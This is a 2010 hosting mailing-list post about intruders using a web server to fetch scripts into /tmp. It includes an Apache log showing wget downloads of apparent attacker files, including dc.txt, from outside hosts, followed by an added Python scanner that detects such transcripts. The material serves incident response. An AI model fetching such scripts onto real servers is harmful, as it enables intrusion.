[BlueOnyx:05934] Re: hacker scripts

Gerald Waugh gwaugh at frontstreetnetworks.com
Mon Nov 29 12:28:40 -05 2010


On Mon, 2010-11-29 at 11:23 -0600, Gerald Waugh wrote:
> On Mon, 2010-11-29 at 17:17 +0000, Steve Howes wrote:
> > On 29 Nov 2010, at 17:08, Gerald Waugh wrote:
> > > How can I stop these people from downloading and running their scripts
> > > in /tmp using httpd
> > 
> > You need to find out how they did it. You're either hosting someone naughty, or someone who has an insecure script. Who owns the files?
> > 
>   apache.apache
> 
> The server has a site with Drupal and some other blog stuff
>  

 /tmp type ext3 (rw,noexec,nosuid)



[Mon Nov 29 05:50:25 2010] [error] [client 208.80.194.26] File does not exist: /home/.sites/132/site96/web/trio.htm&h=300&w=305&sz=49&hl=en&start=526
--06:02:38--  http://193.136.136.86/quixplorer/readme.txt
           => `readme.txt'
Connecting to 193.136.136.86:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,931 (27K) [text/plain]

    0K .......... .......... .......                         100% 56.99 KB/s

06:02:39 (56.99 KB/s) - `readme.txt' saved [27931/27931]

--06:02:39--  http://realezsites.com/pers/cowtipper524/dc.txt
           => `dc.txt'
Resolving realezsites.com... 64.235.52.10
Connecting to realezsites.com|64.235.52.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,140 (2.1K) [text/plain]

    0K ..                                                    100% 2.40 MB/s

06:02:39 (2.40 MB/s) - `dc.txt' saved [2140/2140]

-- 
Gerald 
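
Added example, not part of the original post: a scanner that pulls wget download transcripts like the ones in the log excerpt above out of an Apache error log and records the URL fetched, the file saved, and the last Apache entry seen before it. The function name and the sample log with its addresses are constructed for illustration.

```python
import re

# Apache error entry: "[Mon Nov 29 05:50:25 2010] [error] ..."
APACHE = re.compile(r"^\[(?P<ts>\w{3} \w{3} +\d+ [\d:]{8} \d{4})\] \[\w+\]")
# wget header "--06:02:38--  http://..." (newer wget also prints a date)
WGET_START = re.compile(r"^--(?:\d{4}-\d\d-\d\d )?(?P<t>[\d:]{8})--\s+(?P<url>\S+)")
# wget completion: "06:02:39 (56.99 KB/s) - `readme.txt' saved [27931/27931]"
WGET_SAVED = re.compile(
    r"^(?:\d{4}-\d\d-\d\d )?[\d:]{8} \(.*?\) - [`'\u2018](?P<file>.+?)['\u2019] saved \[(?P<size>\d+)")

def find_wget_transcripts(lines):
    """Return one record per wget run whose output is mixed into the log."""
    hits, last_apache_ts, current = [], None, None
    for n, line in enumerate(lines, 1):
        m = APACHE.match(line)
        if m:
            last_apache_ts = m.group("ts")  # context for the next transcript
            continue
        m = WGET_START.match(line)
        if m:
            current = {"line": n, "time": m.group("t"), "url": m.group("url"),
                       "saved_as": None, "bytes": None,  # stay None if the fetch failed
                       "after_apache_entry": last_apache_ts}
            hits.append(current)
            continue
        m = WGET_SAVED.match(line)
        if m and current is not None:
            current["saved_as"] = m.group("file")
            current["bytes"] = int(m.group("size"))
            current = None
    return hits

# Constructed sample log (documentation addresses, not values from the post).
SAMPLE_LOG = """\
[Mon Nov 29 05:50:25 2010] [error] [client 192.0.2.10] File does not exist: /var/www/missing.htm
--06:02:38--  http://198.51.100.7/app/readme.txt
           => `readme.txt'
Connecting to 198.51.100.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,931 (27K) [text/plain]

06:02:39 (56.99 KB/s) - `readme.txt' saved [27931/27931]

--06:02:39--  http://files.example.net/dc.txt
           => `dc.txt'
HTTP request sent, awaiting response... 404 Not Found
06:02:39 ERROR 404: Not Found.
""".splitlines()
```

The function accepts any iterable of lines, so an open log file can be passed in directly; a record whose `saved_as` is still `None` is a download that started but did not complete.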



